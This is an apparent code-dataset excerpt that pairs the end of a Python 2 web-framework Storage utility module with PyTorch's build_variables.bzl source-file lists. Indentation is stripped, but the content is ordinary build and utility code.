in addition to `obj['foo']`, and setting obj.foo = None deletes item foo.
>>> o = Storage(a=1)
>>> print o.a
1
>>> o['a']
1
>>> o.a = 2
>>> print o['a']
2
>>> del o.a
>>> print o.a
None
"""
__slots__=()
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
__getitem__ = dict.get
__getattr__ = dict.get
__repr__ = lambda self: '<Storage %s>' % dict.__repr__(self)
# http://stackoverflow.com/questions/5247250/why-does-pickle-getstate-accept-as-a-return-value-the-very-instance-it-requi
__getstate__ = lambda self: None
__copy__ = lambda self: Storage(self)
def getlist(self,key):
"""
Return a Storage value as a list.
If the value is a list it will be returned as-is.
If object is None, an empty list will be returned.
Otherwise, [value] will be returned.
Example output for a query string of ?x=abc&y=abc&y=def
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getlist('x')
['abc']
>>> request.vars.getlist('y')
['abc', 'def']
>>> request.vars.getlist('z')
[]
"""
value = self.get(key,[])
return value if not value else \
value if isinstance(value,(list,tuple)) else [value]
def getfirst(self,key,default=None):
"""
Return the first or only value when given a request.vars-style key.
If the value is a list, its first item will be returned;
otherwise, the value will be returned as-is.
Example output for a query string of ?x=abc&y=abc&y=def
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getfirst('x')
'abc'
>>> request.vars.getfirst('y')
'abc'
>>> request.vars.getfirst('z')
"""
values = self.getlist(key)
return values[0] if values else default
def getlast(self,key,default=None):
"""
Returns the last or only single value when
given a request.vars-style key.
If the value is a list, the last item will be returned;
otherwise, the value will be returned as-is.
Simulated output with a query string of ?x=abc&y=abc&y=def
>>> request = Storage()
>>> request.vars = Storage()
>>> request.vars.x = 'abc'
>>> request.vars.y = ['abc', 'def']
>>> request.vars.getlast('x')
'abc'
>>> request.vars.getlast('y')
'def'
>>> request.vars.getlast('z')
"""
values = self.getlist(key)
return values[-1] if values else default
PICKABLE = (str,int,long,float,bool,list,dict,tuple,set)
class StorageList(Storage):
"""
like Storage but missing elements default to [] instead of None
"""
def __getitem__(self,key):
return self.__getattr__(key)
def __getattr__(self, key):
if key in self:
return getattr(self,key)
else:
r = []
setattr(self,key,r)
return r
def load_storage(filename):
fp = None
try:
fp = portalocker.LockedFile(filename, 'rb')
storage = cPickle.load(fp)
finally:
if fp: fp.close()
return Storage(storage)
def save_storage(storage, filename):
fp = None
try:
fp = portalocker.LockedFile(filename, 'wb')
cPickle.dump(dict(storage), fp)
finally:
if fp: fp.close()
class Settings(Storage):
def __setattr__(self, key, value):
if key != 'lock_keys' and self['lock_keys'] and key not in self:
raise SyntaxError, 'setting key \'%s\' does not exist' % key
if key != 'lock_values' and self['lock_values']:
raise SyntaxError, 'setting value cannot be changed: %s' % key
self[key] = value
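# Illustrative sketch (added): once lock_keys is set, Settings rejects new keys.
#   s = Settings()
#   s.debug = True      # ok: keys are not locked yet
#   s.lock_keys = True
#   s.other = 1         # raises SyntaxError: setting key 'other' does not exist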
class Messages(Settings):
def __init__(self, T):
Storage.__init__(self,T=T)
def __getattr__(self, key):
value = self[key]
if isinstance(value, str):
return str(self.T(value))
return value
class FastStorage(dict):
"""
Eventually this should replace class Storage but causes memory leak
because of http://bugs.python.org/issue1469629
>>> s = FastStorage()
>>> s.a = 1
>>> s.a
1
>>> s['a']
1
>>> s.b
>>> s['b']
>>> s['b']=2
>>> s['b']
2
>>> s.b
2
>>> isinstance(s,dict)
True
>>> dict(s)
{'a': 1, 'b': 2}
>>> dict(FastStorage(s))
{'a': 1, 'b': 2}
>>> import pickle
>>> s = pickle.loads(pickle.dumps(s))
>>> dict(s)
{'a': 1, 'b': 2}
>>> del s.b
>>> del s.a
>>> s.a
>>> s.b
>>> s['a']
>>> s['b']
"""
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__ = self
def __getattr__(self,key):
return getattr(self,key) if key in self else None
def __getitem__(self,key):
return dict.get(self,key,None)
def copy(self):
self.__dict__ = {}
s = FastStorage(self)
self.__dict__ = self
return s
def __repr__(self):
return '<Storage %s>' % dict.__repr__(self)
def __getstate__(self):
return dict(self)
def __setstate__(self, sdict):
dict.__init__(self, sdict)
self.__dict__=self
def update(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self.__dict__=self
class List(list):
"""
Like a regular python list but a[i] if i is out of bounds return None
instead of IndexOutOfBounds
"""
def __call__(self, i, default=None, cast=None, otherwise=None):
"""
request.args(0,default=0,cast=int,otherwise='http://error_url')
request.args(0,default=0,cast=int,otherwise=lambda:...)
"""
n = len(self)
if 0<=i<n or -n<=i<0:
value = self[i]
else:
value = default
if cast:
try:
value = cast(value)
except (ValueError, TypeError):
from http import HTTP, redirect
if otherwise is None:
raise HTTP(404)
elif isinstance(otherwise,str):
redirect(otherwise)
elif callable(otherwise):
return otherwise()
else:
raise RuntimeError, "invalid otherwise"
return value
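# Illustrative examples (added):
#   List(['a', 'b'])(0)       -> 'a'
#   List(['a'])(5)            -> None  (out of bounds falls back to default)
#   List(['1'])(0, cast=int)  -> 1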
if __name__ == '__main__':
import doctest
doctest.testmod()
| 27.490706
| 125
| 0.553212
|
4a1903ef21b5ca9c0058b5e328575015cc65a16b
| 54,447
|
bzl
|
Python
|
tools/build_variables.bzl
|
gmagogsfm/pytorch-1
|
88032d894311e5c0aed8bbc21a4306bc6be4af82
|
[
"Intel"
] | 1
|
2019-11-20T08:10:31.000Z
|
2019-11-20T08:10:31.000Z
|
tools/build_variables.bzl
|
goncaloperes/pytorch
|
4a128ed811324b7a8d6cdd9bba16d9aeaac9cf86
|
[
"Intel"
] | null | null | null |
tools/build_variables.bzl
|
goncaloperes/pytorch
|
4a128ed811324b7a8d6cdd9bba16d9aeaac9cf86
|
[
"Intel"
] | null | null | null |
# In both open-source and fbcode builds, these are generated into
# torch/csrc/{autograd,jit}/generated.i
GENERATED_CPP = [
"autograd/generated/Functions.cpp",
"autograd/generated/VariableType_0.cpp",
"autograd/generated/VariableType_1.cpp",
"autograd/generated/VariableType_2.cpp",
"autograd/generated/VariableType_3.cpp",
"autograd/generated/VariableType_4.cpp",
"autograd/generated/TraceType_0.cpp",
"autograd/generated/TraceType_1.cpp",
"autograd/generated/TraceType_2.cpp",
"autograd/generated/TraceType_3.cpp",
"autograd/generated/TraceType_4.cpp",
"autograd/generated/ADInplaceOrViewType_0.cpp",
"autograd/generated/ADInplaceOrViewType_1.cpp",
"autograd/generated/python_functions_0.cpp",
"autograd/generated/python_functions_1.cpp",
"autograd/generated/python_functions_2.cpp",
"autograd/generated/python_functions_3.cpp",
"autograd/generated/python_functions_4.cpp",
"autograd/generated/python_nn_functions.cpp",
"autograd/generated/python_fft_functions.cpp",
"autograd/generated/python_linalg_functions.cpp",
"autograd/generated/python_special_functions.cpp",
"autograd/generated/python_torch_functions_0.cpp",
"autograd/generated/python_torch_functions_1.cpp",
"autograd/generated/python_torch_functions_2.cpp",
"autograd/generated/python_variable_methods.cpp",
]
# NVFuser runtime library
libtorch_nvfuser_runtime_sources = [
"torch/csrc/jit/codegen/cuda/runtime/block_reduction.cu",
"torch/csrc/jit/codegen/cuda/runtime/broadcast.cu",
"torch/csrc/jit/codegen/cuda/runtime/fp16_support.cu",
"torch/csrc/jit/codegen/cuda/runtime/grid_reduction.cu",
"torch/csrc/jit/codegen/cuda/runtime/helpers.cu",
"torch/csrc/jit/codegen/cuda/runtime/random_numbers.cu",
"torch/csrc/jit/codegen/cuda/runtime/tensor.cu",
"aten/src/ATen/cuda/detail/PhiloxCudaStateRaw.cuh",
"aten/src/ATen/cuda/detail/UnpackRaw.cuh",
]
libtorch_nvfuser_generated_headers = ["{}.h".format(name.split("/")[-1].split(".")[0]) for name in libtorch_nvfuser_runtime_sources]
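# For example, "block_reduction.cu" above maps to the generated header "block_reduction.h".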
def libtorch_generated_sources(gencode_pattern):
return [gencode_pattern.format(name) for name in [
"autograd/generated/Functions.cpp",
"autograd/generated/VariableType_0.cpp",
"autograd/generated/VariableType_1.cpp",
"autograd/generated/VariableType_2.cpp",
"autograd/generated/VariableType_3.cpp",
"autograd/generated/VariableType_4.cpp",
"autograd/generated/TraceType_0.cpp",
"autograd/generated/TraceType_1.cpp",
"autograd/generated/TraceType_2.cpp",
"autograd/generated/TraceType_3.cpp",
"autograd/generated/TraceType_4.cpp",
"autograd/generated/ADInplaceOrViewType_0.cpp",
"autograd/generated/ADInplaceOrViewType_1.cpp",
]]
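# For example (illustrative), with the default Buck-style pattern:
#   libtorch_generated_sources(":generate-code[{}]")[0]
#   == ":generate-code[autograd/generated/Functions.cpp]"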
# copied from https://github.com/pytorch/pytorch/blob/f99a693cd9ff7a9b5fdc71357dac66b8192786d3/aten/src/ATen/core/CMakeLists.txt
jit_core_headers = [
"torch/csrc/utils/memory.h",
"torch/csrc/WindowsTorchApiMacro.h",
"torch/csrc/jit/frontend/source_range.h",
"torch/csrc/jit/serialization/callstack_debug_info_serialization.h",
"torch/csrc/jit/serialization/source_range_serialization.h",
"torch/csrc/jit/frontend/lexer.h",
"torch/csrc/jit/frontend/strtod.h",
"torch/csrc/jit/frontend/parser_constants.h",
"torch/csrc/jit/frontend/function_schema_parser.h",
"torch/csrc/jit/frontend/parse_string_literal.h",
"torch/csrc/jit/frontend/schema_type_parser.h",
"torch/csrc/jit/frontend/error_report.h",
"torch/csrc/jit/frontend/tree.h",
"torch/custom_class.h",
"torch/custom_class_detail.h",
"torch/library.h",
]
jit_core_sources = [
"torch/csrc/jit/frontend/error_report.cpp",
"torch/csrc/jit/frontend/function_schema_parser.cpp",
"torch/csrc/jit/frontend/lexer.cpp",
"torch/csrc/jit/frontend/schema_type_parser.cpp",
"torch/csrc/jit/frontend/strtod.cpp",
"torch/csrc/jit/frontend/source_range.cpp",
]
# copied from https://github.com/pytorch/pytorch/blob/0bde610c14b92d351b968a0228df29e92442b1cc/torch/CMakeLists.txt
# Some files are shared between the internal lite interpreter and the full JIT;
# they are kept in a separate list here.
core_sources_common = [
"torch/csrc/autograd/profiler_utils.cpp",
"torch/csrc/autograd/autograd_meta.cpp",
"torch/csrc/autograd/forward_grad.cpp",
"torch/csrc/jit/frontend/edit_distance.cpp",
"torch/csrc/jit/frontend/string_to_type.cpp",
"torch/csrc/jit/mobile/type_parser.cpp",
"torch/csrc/jit/mobile/runtime_compatibility.cpp",
"torch/csrc/jit/runtime/instruction.cpp",
"torch/csrc/jit/runtime/jit_exception.cpp",
"torch/csrc/jit/runtime/operator.cpp",
"torch/csrc/jit/runtime/print_handler.cpp",
"torch/csrc/jit/runtime/slice_indices_adjust.cpp",
"torch/csrc/jit/runtime/register_ops_utils.cpp",
"torch/csrc/jit/runtime/vararg_functions.cpp",
"torch/csrc/jit/mobile/promoted_prim_ops.cpp",
"torch/csrc/jit/mobile/prim_ops_registery.cpp",
"torch/csrc/jit/serialization/import_read.cpp",
"torch/csrc/jit/serialization/unpickler.cpp",
]
libtorch_sources_common = core_sources_common
# The profilers are not needed in the lite interpreter build.
libtorch_profiler_sources = [
"torch/csrc/autograd/profiler_legacy.cpp",
"torch/csrc/autograd/profiler_kineto.cpp",
]
libtorch_edge_profiler_sources = libtorch_profiler_sources + [
"torch/csrc/jit/mobile/profiler_edge.cpp",
]
core_trainer_sources = [
"torch/csrc/autograd/anomaly_mode.cpp",
"torch/csrc/autograd/autograd.cpp",
"torch/csrc/autograd/autograd_not_implemented_fallback.cpp",
"torch/csrc/autograd/cpp_hook.cpp",
"torch/csrc/autograd/custom_function.cpp",
"torch/csrc/autograd/engine.cpp",
"torch/csrc/autograd/function.cpp",
"torch/csrc/autograd/function_hook.cpp",
"torch/csrc/autograd/functions/accumulate_grad.cpp",
"torch/csrc/autograd/functions/basic_ops.cpp",
"torch/csrc/autograd/functions/tensor.cpp",
"torch/csrc/autograd/functions/utils.cpp",
"torch/csrc/autograd/input_buffer.cpp",
"torch/csrc/autograd/record_function_ops.cpp",
"torch/csrc/autograd/saved_variable.cpp",
"torch/csrc/autograd/variable.cpp",
"torch/csrc/jit/frontend/name_mangler.cpp",
"torch/csrc/jit/ir/type_hashing.cpp",
"torch/csrc/jit/serialization/pickler.cpp",
"torch/csrc/jit/serialization/type_name_uniquer.cpp",
]
core_sources_full_mobile_no_backend_interface = [
"torch/csrc/jit/api/function_impl.cpp",
"torch/csrc/jit/api/module.cpp",
"torch/csrc/jit/api/object.cpp",
"torch/csrc/jit/backends/backend_debug_handler.cpp",
"torch/csrc/jit/backends/backend_detail.cpp",
"torch/csrc/jit/backends/backend_resolver.cpp",
"torch/csrc/jit/codegen/fuser/codegen.cpp",
"torch/csrc/jit/codegen/fuser/compiler.cpp",
"torch/csrc/jit/codegen/fuser/executor.cpp",
"torch/csrc/jit/codegen/fuser/fallback.cpp",
"torch/csrc/jit/codegen/fuser/interface.cpp",
"torch/csrc/jit/codegen/fuser/kernel_cache.cpp",
"torch/csrc/jit/frontend/builtin_functions.cpp",
"torch/csrc/jit/frontend/versioned_symbols.cpp",
"torch/csrc/jit/frontend/canonicalize_modified_loop.cpp",
"torch/csrc/jit/frontend/convert_to_ssa.cpp",
"torch/csrc/jit/frontend/exit_transforms.cpp",
"torch/csrc/jit/frontend/inline_loop_condition.cpp",
"torch/csrc/jit/frontend/ir_emitter.cpp",
"torch/csrc/jit/frontend/parser.cpp",
"torch/csrc/jit/frontend/schema_matching.cpp",
"torch/csrc/jit/frontend/script_type_parser.cpp",
"torch/csrc/jit/frontend/sugared_value.cpp",
"torch/csrc/jit/frontend/tracer.cpp",
"torch/csrc/jit/ir/alias_analysis.cpp",
"torch/csrc/jit/ir/attributes.cpp",
"torch/csrc/jit/ir/constants.cpp",
"torch/csrc/jit/ir/ir.cpp",
"torch/csrc/jit/ir/irparser.cpp",
"torch/csrc/jit/ir/node_hashing.cpp",
"torch/csrc/jit/ir/scope.cpp",
"torch/csrc/jit/ir/subgraph_matcher.cpp",
"torch/csrc/jit/jit_log.cpp",
"torch/csrc/jit/jit_opt_limit.cpp",
"torch/csrc/jit/mobile/nnc/aot_compiler.cpp",
"torch/csrc/jit/mobile/nnc/backend.cpp",
"torch/csrc/jit/mobile/nnc/context.cpp",
"torch/csrc/jit/mobile/nnc/registry.cpp",
"torch/csrc/jit/passes/annotate_warns.cpp",
"torch/csrc/jit/passes/bailout_graph.cpp",
"torch/csrc/jit/passes/batch_mm.cpp",
"torch/csrc/jit/passes/canonicalize.cpp",
"torch/csrc/jit/passes/canonicalize_graph_fuser_ops.cpp",
"torch/csrc/jit/passes/clear_profiling.cpp",
"torch/csrc/jit/passes/clear_undefinedness.cpp",
"torch/csrc/jit/passes/common_subexpression_elimination.cpp",
"torch/csrc/jit/passes/concat_opt.cpp",
"torch/csrc/jit/passes/constant_pooling.cpp",
"torch/csrc/jit/passes/constant_propagation.cpp",
"torch/csrc/jit/passes/restore_mutation.cpp",
"torch/csrc/jit/passes/create_autodiff_subgraphs.cpp",
"torch/csrc/jit/passes/dead_code_elimination.cpp",
"torch/csrc/jit/passes/remove_redundant_profiles.cpp",
"torch/csrc/jit/passes/remove_exceptions.cpp",
"torch/csrc/jit/passes/decompose_ops.cpp",
"torch/csrc/jit/passes/erase_number_types.cpp",
"torch/csrc/jit/passes/fixup_trace_scope_blocks.cpp",
"torch/csrc/jit/passes/freeze_module.cpp",
"torch/csrc/jit/passes/fuse_linear.cpp",
"torch/csrc/jit/passes/fuse_relu.cpp",
"torch/csrc/jit/passes/graph_fuser.cpp",
"torch/csrc/jit/passes/graph_rewrite_helper.cpp",
"torch/csrc/jit/passes/guard_elimination.cpp",
"torch/csrc/jit/passes/hoist_conv_packed_params.cpp",
"torch/csrc/jit/passes/inline_autodiff_subgraphs.cpp",
"torch/csrc/jit/passes/inline_forked_closures.cpp",
"torch/csrc/jit/passes/inline_fork_wait.cpp",
"torch/csrc/jit/passes/inliner.cpp",
"torch/csrc/jit/passes/inplace_check.cpp",
"torch/csrc/jit/passes/insert_guards.cpp",
"torch/csrc/jit/passes/lift_closures.cpp",
"torch/csrc/jit/passes/liveness.cpp",
"torch/csrc/jit/passes/loop_unrolling.cpp",
"torch/csrc/jit/passes/lower_grad_of.cpp",
"torch/csrc/jit/passes/lower_tuples.cpp",
"torch/csrc/jit/passes/normalize_ops.cpp",
"torch/csrc/jit/passes/peephole_dict_idioms.cpp",
"torch/csrc/jit/passes/peephole_list_idioms.cpp",
"torch/csrc/jit/passes/value_refinement_utils.cpp",
"torch/csrc/jit/passes/peephole_alias_sensitive.cpp",
"torch/csrc/jit/passes/pass_manager.cpp",
"torch/csrc/jit/passes/peephole.cpp",
"torch/csrc/jit/passes/peephole_non_tensor.cpp",
"torch/csrc/jit/passes/create_functional_graphs.cpp",
"torch/csrc/jit/passes/remove_mutation.cpp",
"torch/csrc/jit/passes/prepack_folding.cpp",
"torch/csrc/jit/passes/fold_conv_bn.cpp",
"torch/csrc/jit/passes/frozen_conv_add_relu_fusion.cpp",
"torch/csrc/jit/passes/frozen_conv_folding.cpp",
"torch/csrc/jit/passes/frozen_ops_to_mkldnn.cpp",
"torch/csrc/jit/passes/frozen_graph_optimizations.cpp",
"torch/csrc/jit/passes/remove_expands.cpp",
"torch/csrc/jit/passes/remove_dropout.cpp",
"torch/csrc/jit/passes/requires_grad_analysis.cpp",
"torch/csrc/jit/passes/shape_analysis.cpp",
"torch/csrc/jit/passes/integer_value_refinement.cpp",
"torch/csrc/jit/passes/symbolic_shape_analysis.cpp",
"torch/csrc/jit/passes/specialize_autogradzero.cpp",
"torch/csrc/jit/passes/update_differentiable_graph_requires_grad.cpp",
"torch/csrc/jit/passes/variadic_ops.cpp",
"torch/csrc/jit/passes/subgraph_rewrite.cpp",
"torch/csrc/jit/passes/tensorexpr_fuser.cpp",
"torch/csrc/jit/passes/utils/memory_dag.cpp",
"torch/csrc/jit/passes/utils/subgraph_utils.cpp",
"torch/csrc/jit/passes/xnnpack_rewrite.cpp",
"torch/csrc/jit/passes/vulkan_rewrite.cpp",
"torch/csrc/jit/passes/metal_rewrite.cpp",
"torch/csrc/jit/passes/quantization/helper.cpp",
"torch/csrc/jit/passes/quantization/quantization_type.cpp",
"torch/csrc/jit/passes/quantization/insert_observers.cpp",
"torch/csrc/jit/passes/quantization/insert_quant_dequant.cpp",
"torch/csrc/jit/passes/quantization/dedup_module_uses.cpp",
"torch/csrc/jit/passes/quantization/finalize.cpp",
"torch/csrc/jit/passes/quantization/fusion_passes.cpp",
"torch/csrc/jit/python/update_graph_executor_opt.cpp",
"torch/csrc/jit/runtime/argument_spec.cpp",
"torch/csrc/jit/runtime/autodiff.cpp",
"torch/csrc/jit/runtime/graph_executor.cpp",
"torch/csrc/jit/runtime/interpreter/frame.cpp",
"torch/csrc/jit/runtime/interpreter/preprocess_graph.cpp",
"torch/csrc/jit/runtime/interpreter.cpp",
"torch/csrc/jit/runtime/logging.cpp",
"torch/csrc/jit/runtime/profiling_graph_executor_impl.cpp",
"torch/csrc/jit/runtime/profiling_record.cpp",
"torch/csrc/jit/runtime/script_profile.cpp",
"torch/csrc/jit/runtime/symbolic_script.cpp",
"torch/csrc/jit/runtime/symbolic_shape_registry.cpp",
"torch/csrc/jit/serialization/callstack_debug_info_serialization.cpp",
"torch/csrc/jit/serialization/import.cpp",
"torch/csrc/jit/serialization/import_export_helpers.cpp",
"torch/csrc/jit/serialization/import_source.cpp",
"torch/csrc/jit/serialization/pickle.cpp",
"torch/csrc/jit/serialization/python_print.cpp",
"torch/csrc/jit/serialization/source_range_serialization.cpp",
"torch/csrc/jit/tensorexpr/block_codegen.cpp",
"torch/csrc/jit/tensorexpr/bounds_inference.cpp",
"torch/csrc/jit/tensorexpr/bounds_overlap.cpp",
"torch/csrc/jit/tensorexpr/codegen.cpp",
"torch/csrc/jit/tensorexpr/cpp_codegen.cpp",
"torch/csrc/jit/tensorexpr/eval.cpp",
"torch/csrc/jit/tensorexpr/expr.cpp",
"torch/csrc/jit/tensorexpr/external_functions_registry.cpp",
"torch/csrc/jit/tensorexpr/graph_opt.cpp",
"torch/csrc/jit/tensorexpr/hash_provider.cpp",
"torch/csrc/jit/tensorexpr/intrinsic_symbols.cpp",
"torch/csrc/jit/tensorexpr/ir.cpp",
"torch/csrc/jit/tensorexpr/ir_cloner.cpp",
"torch/csrc/jit/tensorexpr/ir_mutator.cpp",
"torch/csrc/jit/tensorexpr/ir_printer.cpp",
"torch/csrc/jit/tensorexpr/ir_simplifier.cpp",
"torch/csrc/jit/tensorexpr/ir_verifier.cpp",
"torch/csrc/jit/tensorexpr/ir_visitor.cpp",
"torch/csrc/jit/tensorexpr/kernel.cpp",
"torch/csrc/jit/tensorexpr/llvm_codegen.cpp",
"torch/csrc/jit/tensorexpr/llvm_jit.cpp",
"torch/csrc/jit/tensorexpr/loopnest.cpp",
"torch/csrc/jit/tensorexpr/mem_dependency_checker.cpp",
"torch/csrc/jit/tensorexpr/operators/conv2d.cpp",
"torch/csrc/jit/tensorexpr/operators/matmul.cpp",
"torch/csrc/jit/tensorexpr/operators/norm.cpp",
"torch/csrc/jit/tensorexpr/operators/reduction.cpp",
"torch/csrc/jit/tensorexpr/operators/softmax.cpp",
"torch/csrc/jit/tensorexpr/operators/unary.cpp",
"torch/csrc/jit/tensorexpr/reduction.cpp",
"torch/csrc/jit/tensorexpr/registerizer.cpp",
"torch/csrc/jit/tensorexpr/tensor.cpp",
"torch/csrc/jit/tensorexpr/types.cpp",
"torch/csrc/jit/tensorexpr/unique_name_manager.cpp",
"torch/csrc/jit/testing/file_check.cpp",
"torch/csrc/jit/testing/hooks_for_testing.cpp",
"torch/csrc/utils/tensor_flatten.cpp",
"torch/csrc/utils/variadic.cpp",
]
core_sources_full_mobile = core_sources_full_mobile_no_backend_interface + [
"torch/csrc/jit/backends/backend_debug_info.cpp",
"torch/csrc/jit/backends/backend_interface.cpp",
]
core_sources_full = core_sources_full_mobile + [
"torch/csrc/jit/runtime/static/fusion.cpp",
"torch/csrc/jit/runtime/static/impl.cpp",
"torch/csrc/jit/runtime/static/memory_planner.cpp",
"torch/csrc/jit/runtime/static/native_ops.cpp",
"torch/csrc/jit/runtime/static/ops.cpp",
"torch/csrc/jit/runtime/static/passes.cpp",
"torch/csrc/jit/runtime/static/te_wrapper.cpp",
"torch/csrc/jit/tensorexpr/external_functions.cpp",
"torch/csrc/jit/tensorexpr/external_functions_codegen.cpp",
]
libtorch_core_sources = sorted(core_sources_common + core_sources_full + core_trainer_sources + libtorch_profiler_sources)
# These files are the only ones that are supported on Windows.
libtorch_distributed_base_sources = [
"torch/csrc/distributed/c10d/frontend.cpp",
"torch/csrc/distributed/c10d/comm.cpp",
"torch/csrc/distributed/c10d/default_comm_hooks.cpp",
"torch/csrc/distributed/c10d/FileStore.cpp",
"torch/csrc/distributed/c10d/GlooDeviceFactory.cpp",
"torch/csrc/distributed/c10d/logger.cpp",
"torch/csrc/distributed/c10d/ParamCommsUtils.cpp",
"torch/csrc/distributed/c10d/PrefixStore.cpp",
"torch/csrc/distributed/c10d/ProcessGroup.cpp",
"torch/csrc/distributed/c10d/ProcessGroupGloo.cpp",
"torch/csrc/distributed/c10d/ProcessGroupMPI.cpp",
"torch/csrc/distributed/c10d/ProcessGroupWrapper.cpp",
"torch/csrc/distributed/c10d/quantization/quantization.cpp",
"torch/csrc/distributed/c10d/reducer.cpp",
"torch/csrc/distributed/c10d/sequence_num.cpp",
"torch/csrc/distributed/c10d/Store.cpp",
"torch/csrc/distributed/c10d/TCPStore.cpp",
"torch/csrc/distributed/c10d/Utils.cpp",
]
# These files are only supported on Linux (and others) but not on Windows.
libtorch_distributed_extra_sources = [
"torch/csrc/distributed/autograd/autograd.cpp",
"torch/csrc/distributed/autograd/utils.cpp",
"torch/csrc/distributed/autograd/context/container.cpp",
"torch/csrc/distributed/autograd/context/context.cpp",
"torch/csrc/distributed/autograd/engine/dist_engine.cpp",
"torch/csrc/distributed/autograd/functions/recvrpc_backward.cpp",
"torch/csrc/distributed/autograd/functions/sendrpc_backward.cpp",
"torch/csrc/distributed/autograd/rpc_messages/autograd_metadata.cpp",
"torch/csrc/distributed/autograd/rpc_messages/propagate_gradients_req.cpp",
"torch/csrc/distributed/autograd/rpc_messages/propagate_gradients_resp.cpp",
"torch/csrc/distributed/autograd/rpc_messages/cleanup_autograd_context_req.cpp",
"torch/csrc/distributed/autograd/rpc_messages/cleanup_autograd_context_resp.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rpc_with_autograd.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rpc_with_profiling_req.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rpc_with_profiling_resp.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rref_backward_req.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rref_backward_resp.cpp",
"torch/csrc/distributed/c10d/HashStore.cpp",
"torch/csrc/distributed/c10d/ProcessGroupRoundRobin.cpp",
"torch/csrc/distributed/rpc/agent_utils.cpp",
"torch/csrc/distributed/rpc/message.cpp",
"torch/csrc/distributed/rpc/profiler/remote_profiler_manager.cpp",
"torch/csrc/distributed/rpc/profiler/server_process_global_profiler.cpp",
"torch/csrc/distributed/rpc/python_call.cpp",
"torch/csrc/distributed/rpc/python_remote_call.cpp",
"torch/csrc/distributed/rpc/python_resp.cpp",
"torch/csrc/distributed/rpc/request_callback.cpp",
"torch/csrc/distributed/rpc/request_callback_no_python.cpp",
"torch/csrc/distributed/rpc/rpc_agent.cpp",
"torch/csrc/distributed/rpc/rref_context.cpp",
"torch/csrc/distributed/rpc/rref_impl.cpp",
"torch/csrc/distributed/rpc/rref_proto.cpp",
"torch/csrc/distributed/rpc/script_call.cpp",
"torch/csrc/distributed/rpc/script_remote_call.cpp",
"torch/csrc/distributed/rpc/script_resp.cpp",
"torch/csrc/distributed/rpc/tensorpipe_agent.cpp",
"torch/csrc/distributed/rpc/tensorpipe_utils.cpp",
"torch/csrc/distributed/rpc/testing/faulty_tensorpipe_agent.cpp",
"torch/csrc/distributed/rpc/torchscript_functions.cpp",
"torch/csrc/distributed/rpc/types.cpp",
"torch/csrc/distributed/rpc/utils.cpp",
]
libtorch_distributed_sources = libtorch_distributed_base_sources + libtorch_distributed_extra_sources
jit_sources_full = [
"torch/csrc/jit/codegen/cuda/interface.cpp",
"torch/csrc/jit/passes/lower_graph.cpp",
"torch/csrc/jit/runtime/register_c10_ops.cpp",
"torch/csrc/jit/runtime/register_prim_ops.cpp",
"torch/csrc/jit/runtime/register_prim_ops_fulljit.cpp",
"torch/csrc/jit/runtime/register_special_ops.cpp",
"torch/csrc/jit/passes/remove_inplace_ops.cpp",
"torch/csrc/jit/passes/utils/check_alias_annotation.cpp",
]
libtorch_core_jit_sources = sorted(jit_sources_full)
torch_mobile_core = [
# backend_debug_info.cpp provides the
# __torch__.torch.classes.backend.BackendDebugInfo class.
# Eventually this should not be needed.
# TODO: Remove this dependency
"torch/csrc/jit/backends/backend_debug_info.cpp",
"torch/csrc/jit/mobile/function.cpp",
"torch/csrc/jit/mobile/import.cpp",
"torch/csrc/jit/mobile/interpreter.cpp",
"torch/csrc/jit/mobile/model_compatibility.cpp",
"torch/csrc/jit/mobile/module.cpp",
"torch/csrc/jit/mobile/observer.cpp",
"torch/csrc/jit/mobile/parse_bytecode.cpp",
"torch/csrc/jit/mobile/parse_operators.cpp",
"torch/csrc/jit/runtime/register_prim_ops.cpp",
"torch/csrc/jit/runtime/register_special_ops.cpp",
]
libtorch_lite_eager_symbolication = [
"torch/csrc/jit/frontend/source_range.cpp",
"torch/csrc/jit/ir/scope.cpp",
"torch/csrc/jit/mobile/debug_info.cpp",
"torch/csrc/jit/serialization/callstack_debug_info_serialization.cpp",
"torch/csrc/jit/serialization/source_range_serialization.cpp",
# Later we can split the serialization and deserialization logic
# so that the build is better separated and only the relevant parts are built.
"torch/csrc/jit/serialization/pickle.cpp",
"torch/csrc/jit/serialization/pickler.cpp",
"torch/csrc/jit/serialization/unpickler.cpp",
]
# TODO: core_trainer_sources is not necessary for libtorch lite
libtorch_lite_cmake_sources = sorted(core_trainer_sources + core_sources_common + torch_mobile_core)
libtorch_cmake_sources = libtorch_core_sources + libtorch_core_jit_sources
libtorch_extra_sources = libtorch_core_jit_sources + [
"torch/csrc/autograd/TraceTypeManual.cpp",
"torch/csrc/autograd/VariableTypeManual.cpp",
"torch/csrc/autograd/FunctionsManual.cpp",
"torch/csrc/jit/api/module_save.cpp",
"torch/csrc/jit/codegen/fuser/cpu/fused_kernel.cpp",
"torch/csrc/jit/mobile/backport.cpp",
"torch/csrc/jit/mobile/backport_manager.cpp",
# To be included for eager symbolication in lite interpreter
# when it is built in libtorch
"torch/csrc/jit/mobile/debug_info.cpp",
"torch/csrc/jit/mobile/function.cpp",
"torch/csrc/jit/mobile/import.cpp",
"torch/csrc/jit/mobile/import_data.cpp",
"torch/csrc/jit/mobile/interpreter.cpp",
"torch/csrc/jit/mobile/model_compatibility.cpp",
"torch/csrc/jit/mobile/module.cpp",
"torch/csrc/jit/mobile/observer.cpp",
"torch/csrc/jit/mobile/parse_bytecode.cpp",
"torch/csrc/jit/mobile/parse_operators.cpp",
"torch/csrc/jit/mobile/train/export_data.cpp",
"torch/csrc/jit/mobile/train/optim/sgd.cpp",
"torch/csrc/jit/mobile/train/random.cpp",
"torch/csrc/jit/mobile/train/sequential.cpp",
"torch/csrc/jit/serialization/onnx.cpp",
"torch/csrc/jit/serialization/export.cpp",
"torch/csrc/jit/serialization/export_module.cpp",
"torch/csrc/jit/serialization/import_legacy.cpp",
"torch/csrc/utils/byte_order.cpp",
"torch/csrc/utils/out_types.cpp",
]
